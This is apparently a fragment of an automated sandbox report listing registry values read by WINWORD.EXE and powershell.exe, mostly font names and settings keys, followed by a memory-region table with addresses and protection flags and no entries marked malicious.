C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
36114
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PropertiesWindow
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MainWindow
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MdiMaximized
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dock
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FolderView
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tool
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CtlsShowSelected
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DsnShowSelected
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NULL
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
36114
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
|
|
|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\system32\qagentrt.dll,-10
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\fveui.dll,-843
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\fveui.dll,-844
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\wuaueng.dll,-400
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
|
There are 480 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3B00000
|
unkown
|
page read and write
|
|
|
|
1C96E000
|
unkown
|
page read and write
|
|
|
|
2D7E000
|
unkown
|
page read and write | page guard
|
|
|
|
2C00000
|
unkown image
|
page readonly
|
|
|
|
297000
|
heap default
|
page read and write
|
|
|
|
289F000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
113000
|
unkown
|
page read and write
|
|
|
|
1CC000
|
unkown
|
page read and write
|
|
|
|
97000
|
heap default
|
page read and write
|
|
|
|
29AF000
|
unkown
|
page read and write
|
|
|
|
2B24000
|
unkown
|
page read and write
|
|
|
|
2B50000
|
unkown
|
page read and write
|
|
|
|
160000
|
unkown image
|
page read and write
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
2B00000
|
unkown
|
page read and write
|
|
|
|
30000
|
unkown image
|
page readonly
|
|
|
|
1BB20000
|
heap private
|
page read and write
|
|
|
|
22E0000
|
heap private
|
page read and write
|
|
|
|
3A45000
|
unkown
|
page read and write
|
|
|
|
306F000
|
unkown
|
page read and write
|
|
|
|
38FF000
|
unkown
|
page read and write
|
|
|
|
7FF000E5000
|
unkown
|
page read and write
|
|
|
|
2FDF000
|
unkown
|
page read and write
|
|
|
|
1F3B000
|
heap private
|
page read and write
|
|
|
|
2259000
|
heap private
|
page read and write
|
|
|
|
30BA000
|
unkown
|
page read and write
|
|
|
|
7FF001E0000
|
unkown
|
page execute and read and write
|
|
|
|
7FF001D0000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
1BBB0000
|
heap private
|
page read and write
|
|
|
|
356B000
|
unkown
|
page read and write
|
|
|
|
12D81000
|
unkown
|
page read and write
|
|
|
|
360000
|
heap default
|
page read and write
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
F1000
|
unkown
|
page read and write
|
|
|
|
33A000
|
heap default
|
page read and write
|
|
|
|
15B000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
35C7000
|
unkown
|
page read and write
|
|
|
|
2F60000
|
unkown
|
page read and write
|
|
|
|
2280000
|
unkown
|
page read and write
|
|
|
|
7FF0005C000
|
unkown
|
page execute and read and write
|
|
|
|
1B40000
|
heap private
|
page read and write
|
|
|
|
1C76E000
|
unkown
|
page read and write
|
|
|
|
151000
|
unkown
|
page read and write
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
2B0000
|
unkown
|
page read and write
|
|
|
|
1B5B2000
|
unkown
|
page read and write
|
|
|
|
10000
|
unkown image
|
page read and write
|
|
|
|
14A000
|
unkown
|
page read and write
|
|
|
|
7EFE0000
|
unkown image
|
page readonly
|
|
|
|
305F000
|
unkown
|
page read and write
|
|
